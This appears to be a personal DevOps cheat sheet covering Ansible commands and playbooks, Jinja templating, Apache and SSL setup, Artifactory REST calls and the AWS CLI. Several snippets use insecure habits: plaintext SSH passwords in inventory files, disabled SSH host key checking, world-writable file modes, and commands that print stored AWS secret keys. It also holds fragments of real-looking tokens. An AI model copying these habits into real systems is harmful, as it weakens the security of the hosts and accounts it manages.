        dest: ~/spark-submit/trafficsigns
        mode: 0775

    - debug: msg='folder was amazoncreated for host {{ ansible_host }}'

execute ansible locally, local execution

# --extra-vars="mapr_stream_path={{ some_variable_from_previous_files }}/some-argument" \

ansible localhost \
    --extra-vars="deploy_application=1" \
    --extra-vars=@group_vars/all/vars/all.yml \
    --extra-vars=@group_vars/ubs-staging/vars/ubs-staging.yml \
    -m include_role \
    -a name="roles/labeler"

execute ansible-playbook with external paramters, bash script ansible-playbook with parameters, extra variables, external variables, env var

# variable from env
{{ lookup('env','DB_VARIANT_USERNAME') }}
ansible-playbook -i inventory.ini playbook.yml --extra-vars "$*"

with path to file for external parameters, additional variables from external file

ansible-playbook -i inventory.ini playbook.yml --extra-vars @/path/to/var.properties
ansible-playbook playbook.yml --extra-vars=@/path/to/var.properties

external variables inline

ansible-playbook playbook.yml --extra-vars="oc_project=scenario-test mapr_stream_path=/mapr/prod.zurich/vantage/scenario-test"

check is it working, ad-hoc command

ansible remote* -i inventory.ini -m "ping"
ansible remote* -i inventory.ini --module-name "ping"

## shell
ansible all --module-name shell 'free -m'
# sequence output with fork=1
ansible all --module-name shell --args uptime -f 1

## command
ansible all --module-name command --args 'fdisk -l' --become

## ansible-doc apt
ansible localhost --module-name apt --args 'name=python3 state=present'

## file
# create
ansible all --module-name file --args "path=/tmp/demo_1.txt state=touch mode=666"
ansible all --module-name file --args "path=/tmp/output state=directory mode=666"
# delete
ansible all --module-name file --args "path=/tmp/demo_1.txt state=absent mode=666"
# copy
ansible all --module-name copy --args "src=~/demo.txt dest=/tmp/demo.txt remote_src=yes"
ansible remote* -i inventory.ini -a "hostname"

loop example

    - name: scripts {{ item }}
      template:
        mode: 0777 
        src: "templates/{{ item }}" 
        dest: "{{ root_folder }}/{{ item }}" 
      loop:
        - "start-all.sh"
        - "status.sh"
        - "stop-all.sh"

repeat execution

--limit {playbookfile}.retry

start with task, execute from task, begin with task, skip previous tasks

ansible-playbook playbook.yml --start-at-task="name of the start to be started from"

replace variables inside file to dedicated file, move vars to separate file

  • before
   vars:
      db_user: my_user
      db_password: my_password
      ansible_ssh_pass: my_ssh_password 
      ansible_host: 192.168.1.14
  • after ( 'vars' block is empty ) filepath:
./host_vars/id_of_the_server

or groupvars:

./group_vars/id_of_the_group_into_square_brakets

code

db_user: my_user
db_password: my_password
ansible_ssh_pass: my_ssh_password 
ansible_host: 192.168.1.14

move code to separate file, tasks into file

cut code from original file and paste it into separate file ( with appropriate alignment !!! ), write instead of the code:

    - include: path_to_folder/path_to_file

approprate file should be created:

./path_to_folder/path_to_file

skip/activate some tasks with labeling, tagging

tasks:
- template
    src: template/activation.sh.j2
    dest: /usr/bin/activation.sh
  tags:
  - flag_activation

multitag, multi-tag

tasks:
- template
    src: template/activation.sh.j2
    dest: /usr/bin/activation.sh
  tags:
  - flag_activation
  - flag_skip
ansible-playbook previous-block.yml --skip-tags "flag_activation"
# ansible-playbook previous-block.yml --skip-tags=flag_activation
# ansible-playbook previous-block.yml --tags "flag_activation"
# ansible-playbook previous-block.yml --tags=flag_activation

Debug

export ANSIBLE_STRATEGY=debug
# revert it afterwards ( avoid "ERROR! Invalid play strategy specified: "):
# export ANSIBLE_STRATEGY=linear

print variables

task.args
task.args['src']
vars()

change variables

del(task.args['src'])
task.args['src']="/new path to file"

set variable

- name: Set Apache URL
  set_fact:
    apache_url: 'http://example.com/apache'
    
- name: Download Apache
  shell: wget {{ apache_url }}    

shell == ansible.builtin.shell

manage palying

redo
continue
quit
- name: airflow setup for main (web server) and workers
  hosts: all
  tasks:
  - name: airflow hostname
    debug: msg="{{ lookup('vars', 'ansible_host') }}"      
  - name: all variables from host
    debug: msg="{{ vars }}"      
  when: run_mode == "debug"

debug command

  - debug:
      msg: "print variable: {{  my_own_var }}"
  - shell: /usr/bin/uptime
    register: result

  - debug:
      var: result

env variables bashrc

- name: source bashrc
  sudo: no   
  shell: . /home/username/.bashrc && [the actual command you want run]

rsync copy files

  - name: copy source code
    synchronize:
      src: '{{ item.src }}'
      dest: '{{ item.dest }}'
      delete: yes
      recursive: yes
      rsync_opts:
        - "--exclude=.git"
        - "-avz"
        - '-e ssh -i {{ key }} '
    with_items:
    - { src: '{{ path_to_repo }}/airflow-dag/airflow_shopify/', dest: '/home/ubuntu/airflow/airflow-dag/airflow_shopify/' }

ec2 managing airflow ec2

export PATH=$PATH:/home/ubuntu/.local/bin
nohup airflow webserver

debug module

argument file ( args.json )

{
    "ANSIBLE_MODULE_ARGS": {
        "task_parameter_1": "just a string",
        "task_parameter_2": 50
    }
}

execute file

python3 -m pdb library/oc_collaboration.py args.json

set breakpoint

import pdb
...
pdb.set_trace()

run until breakpoint

until 9999
next

debug module inline, execute module inline, adhoc module check

ansible localhost -m debug --args msg="my custom message"
# collect facts
ansible localhost -m setup

task print all variables

- name: "Ansible | List all known variables and facts"
  debug:
    var: hostvars[inventory_hostname]

ansible-console

ansible-console
debug msg="my custom message"
shell pwd

ansible print stdout

# default ansible output
ANSIBLE_STDOUT_CALLBACK=yaml
# humand readable output
ANSIBLE_STDOUT_CALLBACK=debug

error handling, try catch

stop execution of steps (of playbook) when at least one server will throw error

  any_errors_fatal:true

not to throw error for one certain task

 - mail:
     to: [email protected]
     subject: info
     body: das ist information
   ignore_errors: yes

fail when, fail by condition, parse log file for errors

  - command: cat /var/log/server.log
    register: server_log_file
    failed_when : "'ERROR' in server_log_file.stdout"

template, Jinja2 templating, pipes, ansible filtering

default value

default path is {{ my_custom_path | default("/opt/program/script.sh") }}

escape special characters

{{ '{{ filename }}.log' }}

operation with list

{{ [1,2,3] | default(5) }}
{{ [1,2,3] | min }}
{{ [1,2,3] | max }}
{{ [1,2,3] | first }}
{{ [1,2,3] | last }}
{{ [1,2,3,2,3,] | unique }}
{{ [1,2,3] | union([1,2]) }}
{{ [1,2,3] | intersect([3]) }}
{{ 100 | random }}
{{ ["space", "separated", "value"] | join(" ") }}
{{'latest' if (my_own_value is defined) else 'local-build'}}

file name from path (return 'script.sh')

{{ "/etc/program/script.sh" | basename }}

copy file and rename it, pipe replace suffix

- name: Create DAG config
  template: src={{ item }} dest={{ airflow_dag_dir }}/config/{{ item | basename | regex_replace('\.j2','') }}
  with_fileglob:
    - ../airflow_dags/airflow_dags_gt/config/*.py.j2

jinja conditions

{% if deployment.jenkins_test_env is defined -%}
some yaml code
{% endif %}

copy reverse copy from destination machine

- name: Fetch template
  fetch:
    src: '{{ only_file_name }}'
    dest: '{{ destination_folder }}'
    flat: yes
  tags: deploy

directives for Jinja

for improving indentation globally in file, add one of next line in the beginning

#jinja2: lstrip_blocks: True
#jinja2: trim_blocks:False
#jinja2: lstrip_blocks: True, trim_blocks: True

for improving indentation only for the block

<div>
        {%+ if something %}<span>hello</span>{% endif %}
</div>

condition example

{% if lookup('env','DEBUG') == "true" %}
    CMD ["java", "start-debug"]
{% else %}
    CMD ["java", "start"]
{% endif %}

directives for loop, for last, loop last

[
{% for stream in deployment.streams %}
    {
        "stream": "{{ stream.stream_name }}",
        "classN": "{{ stream.class_name }}",
        "script": "{{ stream.script_name }}",
        "sibFolders": [
        {% for folder in stream.sub_folders %}
            "{{ folder }}"{% if not loop.last %},{% endif %}
        {% endfor %}
        ]
    }{% if not loop.last %},{% endif %}
{% endfor %}
]

escaping

just a symbol

{{ '{{' }}

bigger piece of code

{% raw %}
    <ul>
    {% for item in seq %}
        <li>{{ item }}</li>
    {% endfor %}
    </ul>
{% endraw %}

template with tempfile

- hosts: localhost
  gather_facts: no
  tasks:
    - tempfile:
        state:  file
        suffix: config
      register: temp_config

    - template:
        src:  templates/configfile.j2
        dest: "{{ temp_config.path }}"

settings for modules

also need to 'notify' ansible about module giving one of the next option:

  • add your folder with module to environment variable ANSIBLE_LIBRARY
  • update $HOME/.ansible.cfg
    library=/path/to/module/library

module documentation

ansible-doc -t module {name of the module}

minimal module

from ansible.module_utils.basic import AnsibleModule
def main():
    input_fields = {
        "operation": {"required": True, "type": "str"},
        "file": {"required": True, "type": "str"},
        "timeout": {"required": False, "type": "int", "default": "120"}
    }
    module = AnsibleModule(argument_spec=input_fields)
    operation = module.params["operation"]
    file = module.params["file"]
    timeout = module.params["timeout"]
    # module.fail_json(msg="you must be logged in into OpenShift")
    module.exit_json(changed=True, meta={operation: "create"})    

example of plugin

{{ list_of_values | average }}

python code for plugin

def average(list):
    return sum(list) / float(len(list))
    
class AverageModule(object):
    def filters(self):
        return {'average': average}

execution

export ANSIBLE_FILTER_PLUGINS=/full/path/to/folder/with/plugin
ansible-playbook playbook.yml

lookups

# documentation
ansible-doc -t lookup -l
ansible-doc -t lookup csvfile

replace value from file with special format

{{ lookup('csvfile', 'web_server file=credentials.csv delimiter=,') }}
{{ lookup('ini', 'password section=web_server file=credentials.ini') }}
{{ lookup('env','DESTINATION') }}
{{ lookup('file','/tmp/version.txt') }}

lookups variables

{{ hostvars[inventory_hostname]['somevar_' + other_var] }}

For ‘non host vars’ you can use the vars lookup plugin:
{{ lookup('vars', 'somevar_' + other_var) }}
- name: airflow setup for main (web server) and workers
  hosts: all
  tasks:
  - name: airflow hostname
    debug: msg="{{ lookup('vars', 'ansible_host') }}"      
  - name: variable lookup
    debug: msg="lookup data {{ lookup('vars', 'ansible_host')+lookup('vars', 'ansible_host') }}"
  - name: read from ini, set variable
    set_fact:
      queues: "{{ lookup('ini', lookup('vars', 'ansible_host')+' section=queue file=airflow-'+lookup('vars', 'account_id')+'-workers.ini') }}"
  - name: airflow lookup
    debug: msg=" {{ '--queues '+lookup('vars', 'queues') if lookup('vars', 'queues') else '<default>'  }}"

inventory file


inventory file, inventory file with variables, rules

[all]
10.2.2.24
10.2.2.25
10.2.2.26
[remote_ssh]
172.28.128.3     ansible_connection=ssh   ansible_port=22   ansible_user=tc     ansible_password=tc

dynamic inventory

python inventory.py (with 'py' extension) instead of txt

import json
data = {"databases": {"hosts": ["host1", "host2"], "vars": {"ansible_ssh_host":"192.168.10.12", "ansible_ssh_pass":"Passw0rd"} }}
print(json.dumps(data))

also next logic should be present

inventory.py --list
inventory.py --host databases

prepared scripts

inventory file with variables ( python Jinja templating)

[remote_ssh]
172.28.128.3     ansible_connection=ssh   ansible_port=22   ansible_user=tc     ansible_password=tc   http_port=8090

playbook usage:

'{{http_port}}'

execution with inventory examples

for one specific host without inventory file

ansible-playbook playbook.yml -i 10.10.10.10

with inventory file

ansible-playbook -i inventory.ini playbook.yml 

issue with execution playbook for localhost only, local execution

Note that the implicit localhost does not match 'all'
...
skipping: no hosts matched 

solution

ansible-playbook --inventory="localhost," --connection=local --limit=localhost --skip-tag="python-script" playbook.yaml

# example with external variables
ansible-playbook --inventory="localhost," --connection=local --limit=localhost \
--extra-vars="oc_project=scenario-test mapr_stream_path=/mapr/prod.zurich/vantage/scenario-test" \
--tag="scenario-service" deploy-scenario-pipeline.yaml

solution2

#vim /etc/ansible/hosts
localhost ansible_connection=local

strategy


  strategy: linear
  • linear ( default ) after each step waiting for all servers
  • free independently for all servers - someone can finish installation significantly earlier than others

additional parameter - specify amount of servers to be executed at the time ( for default strategy only )

  serial: 3
  serial: 20%
  serial: [5,15,20]

default value "serial" into configuration ansible.cfg

forks = 5

async execution, nowait task, command execution

not all modules support this operation execute command in asynchronous mode ( with preliminary estimation 120 sec ), with default poll result of the command - 10 ( seconds )

  async: 120

execute command in asynchronous mode ( with preliminary estimation 120 sec ), with poll result of the command - 60 ( seconds )

  async: 120
  poll: 60

execute command and forget, not to wait for execution

  async: 120
  poll: 0

execute command in asynchronous mode, register result checking result at the end of the file

- command: /opt/my_personal_long_run_command.sh
  async: 120
  poll: 0
  register: custom_command_result
  
- name: check status result
  async_status: jid={{ custom_command_result.ansible_job_id }}
  register: command_result
  until: command_result.finished
  retries: 20

roles


init project ansible-galaxy, create new role, init role

execute code into your project folder './roles'

ansible-galaxy init {project/role name}

result:

./roles/{project/role name}
	#         Main list of tasks that the role executes
    /tasks
	#         Files that the role deploys
    /files
	#         Handlers, which may be used within or outside this role
    /handlers
	#         Modules, which may be used within this role
    /library
	#         Default variables for the role
    /defaults
	#         Other variables for the role
    /vars
	#         Templates that the role deploys
    /templates
	#         Metadata for the role, including role dependencies
    /meta

insert into code

  roles:
  - {project/role name}

all folders of the created project will be applied to your project ( tasks, vars, defaults ) in case of manual creation - only necessary folders can be created

ansible search for existing role

ansible-galaxy search {project/role name/some text}
ansible-galaxy info role-name

import existing roles from ansible galaxy

cd roles
ansible-galaxy import {name of the project/role}

# print out existing roles
ansible-galaxy role list 

insert into code

  roles:
  - {project/role name}

all folders of the imported project will be applied to your project ( tasks, vars, defaults )

import task from role, role.task, task inside role

- hosts: localhost
  # hosts: all
  # hosts: <name of section from inventory file>
  tasks:
  - name: first step
    include_role:
      name: mapr-kafka
      tasks_from: cluster-login

or

- name: Deploy session
  import_tasks: roles/dag-common/tasks/deployment-tasks.yaml
  vars:
    dag_deploy_dir: /mapr/swiss.zur/airlfow/deploy
  tags:
    - release

export

create/update file:

./roles/{project/role name}/meta/main.yml

local run local start playbook

- hosts: localhost
  tasks:
  - name: Ansible create file with content example
    copy:
      dest: "/tmp/remote_server.txt"
      content: |
        dog
        tiger

minimal playbook

- hosts: localhost
  tasks:
  - name: Ansible create file with content example
    copy:
      dest: "/tmp/remote_server.txt"
      content: |
        {{ lookup('env','TEST_1') }}
        {{ lookup('env','TEST_2') }}
ansible-playbook ansible-example.yml

execute role, role execution, start role locally, local start, role local execution, check role

ansible-galaxy init print-message

echo '- name: "update apt packages."
  become: yes
  apt:
    update_cache: yes
    
- name: install apache
  apt:
    name: ["apache2"]

- name: create file
  shell:
    cmd: echo "hello from container {{ role_name }}" > /var/www/html/index.html

- name: start service
  service:
    name: "apache2"
    state: "started"
' > print-message/tasks/main.yml

# execute for localhost
ansible localhost --module-name include_role --args 'name=print-message'

# execute ansible role for docker container
docker start atlassian/ssh-ubuntu:0.2.2
ansible all -i 172.17.0.2, --extra-vars "ansible_user=root ansible_password=root" --module-name include_role --args 'name=print-message'

x-www-browser http://172.17.0.2
ansible localhost \
    --extra-vars="deploy_application=1" \
    --extra-vars=@group_vars/all/defaults/all.yaml \
    --extra-vars=@group_vars/all/vars/all.yaml \
    --extra-vars="mapr_stream_path={{ some_variable_from_previous_files }}/some-argument" \
    -m include_role \
    -a name="new_application/new_role"

where "include_role" - module to run ( magic word )
where "new_application/new_role" - subfolder to role where @group_vars/all/default/all.yaml - sub-path to yaml file with additional variables

console output with applied roles should looks like

TASK [{project/role name}: {task name}] ***********************************

for example

TASK [java : install java with jdbc libraries] ***********************************

file encryption, vault

ansible-vault encrypt inventory.txt
ansible-vault view inventory.txt
ansible-vault create inventory.txt

ask password via command line

ansible-playbook playbook.yml -i inventory.txt -ask-vault-pass

file should contain the password

ansible-playbook playbook.yml -i inventory.txt -vault-password-file ./file_with_pass.txt

script should return password

ansible-playbook playbook.yml -i inventory.txt -vault-password-file ./file_with_pass.py

modules

apt, python installation

- name: example of apt install 
  apt: name='{{ item }}' state=installed
  with_items:
    - python
    - python-setuptools
    - python-dev
    - build-essential
    - python-pip
- name: example of start unix service
  service:
    name: mysql
    state: started
    enabled: yes
- name: manage python packages via pip 
  pip:
    name: flask

include variables import variables

- name: External variables
  include_vars: roles/marker-table/defaults/main.yaml
  tags: deploy

echo

add flag for ansible or ansible-playbook:-vvv(3) -vv (2) or -v (1)

- debug:
    msg: ">>> {{ data_portal_deploy_folder }}/data-portal.jar"
    var: src
    verbosity: 2
- name: Ensure MOTD file is in place
  copy:
    src: files/motd
    dest: /etc/motd
    owner: root
    group: root
    mode: 0644
    
- name: Ensure MOTD file is in place
  copy:
    content: "Welcome to this system."
    dest: /etc/motd
    owner: root
    group: root
    mode: 0644
- name: Ensure MOTD file is in place
  template:
    src: templates/motd.j2
    dest: /etc/motd
    owner: root
    group: root
    mode: 0644
- name: Ensure user1 exists
  user:
    name: user1
    group: users
    groups: wheel
    uid: 2001
    password: "{{ 'mypassword' | password_hash('sha512') }}"
    state: present
- name: Ensure Apache package is installed
  package:
    name: httpd
    state: present
- name: Ensure port 80 (http) is open
  firewalld:
    service: http
    state: enabled
    permanent: yes
    immediate: yes
- name: Ensure directory /app exists
  file:
    path: /app
    state: directory
    owner: user1
    group: docker
    mode: 0770
- name: Ensure host my-own-host in hosts file
  lineinfile:
    path: /etc/hosts
    line: 192.168.0.36 my-own-host
    state: present
    
- name: Ensure root cannot login via ssh
  lineinfile:
    path: /etc/ssh/sshd_config
    regexp: '^PermitRootLogin'
    line: PermitRootLogin no
    state: present

delegate task to specific host

- name: Set version information
  lineinfile:
    path: "{{ working_folder }}/version.json"
    regexp: "{{ item.Reg }}"
    line: "{{ item.Line }}"
  with_items:
    - { Reg: 'releaseName', Line: '"releaseName": "{{ release_name }}",' }
    - { Reg: 'releaseNotesUrl', Line: '"releaseNotesUrl": "{{ release_notes_url }}",' }
  delegate_to: localhost
  tags: deploy
- name: Extract content from archive
  unarchive:
    src: /home/user1/Download/app.tar.gz
    dest: /app
    remote_src: yes
- name: Run bash script
  command: "/home/user1/install-package.sh"

TBD

  • system
  • commands
  • database
  • cloud
  • windows

issues

fingerprint checking

fatal: [172.28.128.4]: FAILED! => {"msg": "Using a SSH password instead of a key is not possible because Host Key checking is enabled and sshpass does not support this.  Please add this host's fingerprint to your known_hosts file to manage this host."}

resolution

export ANSIBLE_HOST_KEY_CHECKING=False
ansible-playbook -i inventory.ini playbook-directory.yml

apache server cheat sheet

apache tutorial

apache installation apache settings

manage httpd

# apache server installation, apache server run, web server run, webserver start
sudo su
yum update -y
yum install -y httpd
service httpd start
chkconfig httpd
chkconfig httpd on
vim /var/www/html/index.html

debian apache simple installation

#!/bin/sh
sudo apt update
sudo apt install apache2 -y
sudo ufw allow 'Apache'
sudo systemctl start apache2
# Create a new index.html file at  /var/www/html/ path
echo "<html> <head><title>server 01</title> </head> <body><h1>This is server 01 </h1></body> </html>" > /var/www/html/index.html

debian apache installation

# installation
sudo su
apt update -y
apt install -y apache2

# service 
sudo systemctl status apache2.service
sudo systemctl start apache2.service

# change index html
vim /var/www/html/index.html

# Uncomplicated FireWall
ufw app list
ufw allow 'Apache'
ufw status

# enable module
a2enmod rewrite

# disable module
# http://manpages.ubuntu.com/manpages/trusty/man8/a2enmod.8.html
a2dismod rewrite

# enable or disable site/virtual host
# http://manpages.ubuntu.com/manpages/trusty/man8/a2ensite.8.html
a2dissite *.conf
a2ensite my_public_special.conf

apache management

sudo service apache2 start
sudo service apache2 restart

apache SSL

activate ssl module

sudo a2enmod ssl
sudo a2dismod ssl

creating self-signed certificates

sudo make-ssl-cert generate-default-snakeoil --force-overwrite

check certificates

sudo ls -la /etc/ssl/certs/ssl-cert-snakeoil.pem
sudo ls -la /etc/ssl/private/ssl-cert-snakeoil.key

cert configuration

vim /etc/apache2/sites-available/default-ssl.conf
                SSLCertificateFile      /etc/ssl/certs/ssl-cert-snakeoil.pem
                SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key

Generating a RSA private key

openssl req -new -newkey rsa:2048 \
-nodes -out cherkavideveloper.csr \
-keyout cherkavideveloper.key \
-subj "/C=DE/ST=Bavaria/L=München/O=cherkavi/CN=cherkavi developer" \
vim /etc/apache2/sites-available/default-ssl.conf
SSLCertificateFile "/path/to/www.example.com.cert"
SSLCertificateKeyFile "/path/to/www.example.com.key"

parallel open connection

<IfModule mpm_prefork_module>
	  #LoadModule cgi_module modules/mod_cgi.so
    StartServers       5
    MinSpareServers    7
    MaxSpareServers   15
    ServerLimit 600
    MaxRequestWorkers 600
    MaxConnectionsPerChild 0
</IfModule>

Apache in OpenShift/Kubernetes

flowchart LR
    client --> or[ocp route] --> os[ocp service] --> op[ocp pod] --> a[apache]
    cm[config map] -.->|read| a
    a --> os2[ocp service 2]
    a --> os3[ocp service 3]
Loading

Apache with Keycloak

image

Artifactory cheat sheet

REST endpoints

token generation

ARTIFACTORY_URL=https://artifactory.sbbgroup.net/artifactory 
USERNAME="cherkavi"
curl -u "$USERNAME" -XPOST "$ARTIFACTORY_URL/api/security/token" -d "username=$USERNAME" -d "scope=member-of-groups:*" -d "expires_in=315360000"

plain password should be replaced in files

# ~/.git-credentials
# ~/.m2/settings.xml
curl -H "Authorization: Bearer $TOKEN" -X GET "${ARTIFACTORY_URL}/artifactory/api/system/ping"
# check token: https://jwt.io/#encoded-jwt

get artifact from artifactory

URL="https://artifactory.sbbgroup.net/artifactory/management-snapshots/com/ad/cicd/jenkins/jenkins-labeling-6b999cadc054-SNAPSHOT-jenkins.zip"
OUTPUT_FILE=`echo $URL | awk -F '/' '{print $(NF)}'`
rm $OUTPUT_FILE
curl -u $ARTIFACTORY_USER:$ARTIFACTORY_PASS -X GET  $URL -o $OUTPUT_FILE
ls -la $OUTPUT_FILE

mv $OUTPUT_FILE $OUTPUT_FILE-original

upload to artifactory

URL="https://artifactory.sbbgroup.net/artifactory/management-snapshots/com/ad/cicd/jenkins/jenkins-labeling-6b999cadc054-SNAPSHOT-jenkins.zip"
OUTPUT_FILE=`echo $URL | awk -F '/' '{print $(NF)}'`
UPLOAD_FILE="jenkins-labeling-6b999cadc054-SNAPSHOT-jenkins.zip"
curl -u $ARTIFACTORY_USER:$ARTIFACTORY_PASS -X PUT  $URL --data-binary @${UPLOAD_FILE}

# curl -v --user username:password -X PUT urlGoesHere --data-binary fileToBeDeployed

upload docker image to artifactory

DOCKER_USER=tech-user
DOCKER_TOKEN=shyqWHDzXMwtQ....
DOCKER_URL=artifactory.ubsgroup.com

docker login -u $DOCKER_USER -p $DOCKER_TOKEN $DOCKER_URL
DOCKER_IMAGE=$DOCKER_URL/project-docker/portal-e2e:2.0.0
docker push $DOCKER_IMAGE

F.A.Q

error from endpoint

{
  "errors" : [ {
    "status" : 403,
    "message" : "The user: 'tu-datacenter' is not permitted to deploy ... 
  } ]
}

check user's permission

AWS cheat sheet

Visual tools for drawing architecture

links

DOCUMENTATION

examples

trainings

others

decisions

way of building architecture

way of building architecture

cloud advisor

cloud-advisor

fault tolerance, high performance

fault tolerance, high performance

shared responsibility model

shared model

serverless

serverless

ARN - Amazon Resource Name

all the resources in cloud have arn: name

sdk commands:

  • low level commands
  • high level commands

sdk operations:

  • blocking - synchronous
  • unblocking - asynchronous

aws CDK - Cloud Development Kit

pip search aws-cdk-lib
pip install aws-cdk-lib
npm search @aws-cdk
npm install [email protected]

aws cli

aws cli is a python application

# installation
sudo apt install awscli
pip install awscli
# set up user
aws configuration
docker run --rm -it  -v $(pwd):/aws  public.ecr.aws/aws-cli/aws-cli --version
# share local credentials with docker container 
docker run --rm -it  -v $(pwd):/aws  -v ~/.aws:/root/.aws public.ecr.aws/aws-cli/aws-cli command

console command completion, console completion

pip3 install awscli
# complete -C `locate aws_completer` aws
complete -C aws_completer aws

be aware about precedence:

  1. Credentials from environment variables have precedence over credentials from the shared credentials and AWS CLI config file.
    env variables: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html
  2. Credentials specified in the shared credentials file have precedence over credentials in the AWS CLI config file.

botocore.exceptions.ProfileNotFound: The config profile (cherkavi-user) could not be found

vim ~/.aws/credentials
[cherkavi-user]
aws_access_key_id = AKI...
aws_secret_access_key = ur1DxNvEn...
aws_session_token = FwoG....

or

aws configure set aws_session_token "Your-value" --profile cherkavi-user
# or
aws configure set cherkavi-user.aws_session_token "Your-value" 

check configuration: vim ~/.aws/config

using profiling

--region, --output, --profile

aws configure list-profiles
# default profile will be used from env variable AWS_PROFILE
aws s3 ls --profile $AWS_PROFILE

login: set AWS credentials via env variables

# source file_with_credentials.sh
export AWS_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=SEP6...

login: set AWS credentials via config file

# aws cli version 2
aws configure set aws_access_key_id <yourAccessKey>
aws configure set aws_secret_access_key <yourSecretKey>
# aws configure set aws_session_token <yourToken>

# aws cli version 1
aws configure set ${AWS_PROFILE}.aws_access_key_id ...
aws configure set ${AWS_PROFILE}.aws_secret_access_key ...
# aws configure set ${AWS_PROFILE}.aws_session_token ...

login: get AWS credentials via config file

aws configure get aws_access_key_id

login: sso

aws configure sso

# check configuration:
cat ~/.aws/config | grep sso-session

activate profile

aws sso login --sso-session $SSO-SESSION_NAME
aws sso login --profile $AWS_PROFILE_DEV

or

# aws configure export-credentials --profile RefDataFrame-cicd --format env
eval "$(aws configure export-credentials --profile RefDataFrame-cicd --format env)"

debugging collaboration verbosity full request

for API level debugging you should use CloudTrail

aws --debug s3 ls --profile $AWS_PROFILE

init variables

inline initialization

or put the same in separated file: . /home/projects/current-project/aws.sh

# export HOME_PROJECTS_GITHUB - path to the folder with cloned repos from https://github.com/cherkavi
export AWS_SNS_TOPIC_ARN=arn:aws:sns:eu-central-1:85153298123:gmail-your-name
export AWS_KEY_PAIR=/path/to/file/key-pair.pem
export AWS_PROFILE=aws-user
export AWS_REGION=eu-central-1

# aws default value for region 
export AWS_DEFAULT_REGION=eu-central-1

export current_browser="google-chrome" # current_browser=$BROWSER
export aws_service_abbr="sns"
function aws-cli-doc(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi
    x-www-browser "https://docs.aws.amazon.com/cli/latest/reference/${aws_service_abbr}/index.html" &
}
function aws-faq(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi
    x-www-browser "https://aws.amazon.com/${aws_service_abbr}/faqs/" &
}
function aws-feature(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi    
    x-www-browser "https://aws.amazon.com/${aws_service_abbr}/features/" &
}
function aws-console(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi
    x-www-browser "https://console.aws.amazon.com/${aws_service_abbr}/home?region=$AWS_REGION" &
}

check configuration

vim ~/.aws/credentials

aws configure list
# default region will be used from env variable: AWS_REGION
aws configure get region --profile $AWS_PROFILE
aws configure get aws_access_key_id
aws configure get default.aws_access_key_id
aws configure get $AWS_PROFILE.aws_access_key_id
aws configure get $AWS_PROFILE.aws_secret_access_key

url to cli documentation, faq, collection of questions, UI

export aws_service_abbr="sns"

resource query, jsonpath query, aws json output path, aws json xpath

aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].PublicIpAddress' \
--filters "Name=tag:Project,Values=udacity"
aws configservice select-resource-config --expression "SELECT resourceId WHERE resourceType='AWS::EC2::Instance'"

budget limit, cost management, budget cost explorer

price/cost formation: write - free, read - payable

aws_service_abbr="cost-management"
x-www-browser https://${AWS_REGION}.console.aws.amazon.com/cost-management/home?region=${AWS_REGION}#/dashboard
x-www-browser https://${AWS_REGION}.console.aws.amazon.com/billing/home?region=${AWS_REGION}#/budgets

IAM - Identity Access Manager

Type of the access:

aws_service_abbr="iam"
aws-cli-doc
aws-faq
aws-console
aws iam list-users 

# example of adding user to group 
aws iam add-user-to-group --group-name s3-full-access --user-name user-s3-bucket

# get role 
aws iam list-roles
aws iam get-role --role-name $ROLE_NAME

# policy find by name
POLICY_NAME=AmazonEKSWorkerNodePolicy
aws iam list-policies --query "Policies[?PolicyName=='$POLICY_NAME']"
aws iam list-policies --output text --query 'Policies[?PolicyName == `$POLICY_NAME`].Arn'
# policy get by ARN
aws iam get-policy-version --policy-arn $POLICY_ARN --version-id v1
# policy list 
aws iam list-attached-role-policies --role-name $ROLE_NAME
# policy attach 
aws iam attach-role-policy --policy-arn $POLICY_ARN --role-name $ROLE_NAME

example of role with policy creation with awscli

Policy

Policy types

  • Resource based
  • IAM based

Policy parts:

  • Principal ( User, Group )
  • Action (example for s3 keys and action)
  • Resource
  • Condition
    tag of the resource can be involved in condition

create policy from error output of aws-cli command:

User is not authorized to perform AccessDeniedException

aws iam list-groups 2>&1 | /home/projects/bash-example/awk-policy-json.sh
# or just copy it
echo "when calling the ListFunctions operation: Use..." | /home/projects/bash-example/awk-policy-json.sh

test sandbox for the policy


VPC

aws_service_abbr="vpc"
aws-cli-doc
aws-faq
aws-console

example of creating subnetwork:

VPC: 172.31.0.0    
Subnetwork: 172.31.0.0/16, 172.31.0.0/26, 172.31.0.64/26

VPC Flow logs

like Wireshark for VPC

VPC endpoint

it is internal tunnel betweeen VPC and the rest of AWS resources
when you are creating target endpoint (to access S3, for instance) and want to use it from ec2, then add also

  • SSMMessagesEndpoint
  • EC2MessagesEndpoint

NAT

NAT Gateway (NGW) allows instances with no public IPs to access the internet.


IGW

Internet Gateway (IGW) allows instances with public IPs to access the internet.

public access internet outside access

  1. create gateway 2 .vpc -> route tables -> add route Security Group
  2. inbound rules -> source 0.0.0.0/0

Transit Gateway

  1. Create Transit Gateway
  2. Create Transit Gateway attachment
  3. Create Transit Gateway route table
  4. Create Transit Gateway route table association
  5. Create Transit Gateway route table propagation
  6. Update VPC's route tables

Storage Gateway

is a service that connects an on-premises software appliance with cloud-based storage to provide seamless and secure integration between your on-premises IT environment and the AWS storage infrastructure in the AWS Cloud


S3 - object storage

there are S3 Filegateway

aws_service_abbr='s3'
aws-cli-doc
aws-faq
aws-console

s3 static web site

s3 static web site DNS

for instance your DNS name is: my.service

  1. create bucket with name: my.service.s3-website.{your region}.amazonaws.com
  2. create bucket with name: www.my.service.s3-website.{your region}.amazonaws.com
  3. create DNS record: type: CNAME, name: www, value www.my.service.s3-website.{your region}.amazonaws.com

s3 static web site SSL (HTTPS) certificate

for instance your DNS name is: my.service create cloudfront distribution: https://us-east-1.console.aws.amazon.com/cloudfront

  1. origin domain: your www.my.service.s3-website.{your region}.amazonaws.com

    important to have www prefix

  2. protocol: HTTP only
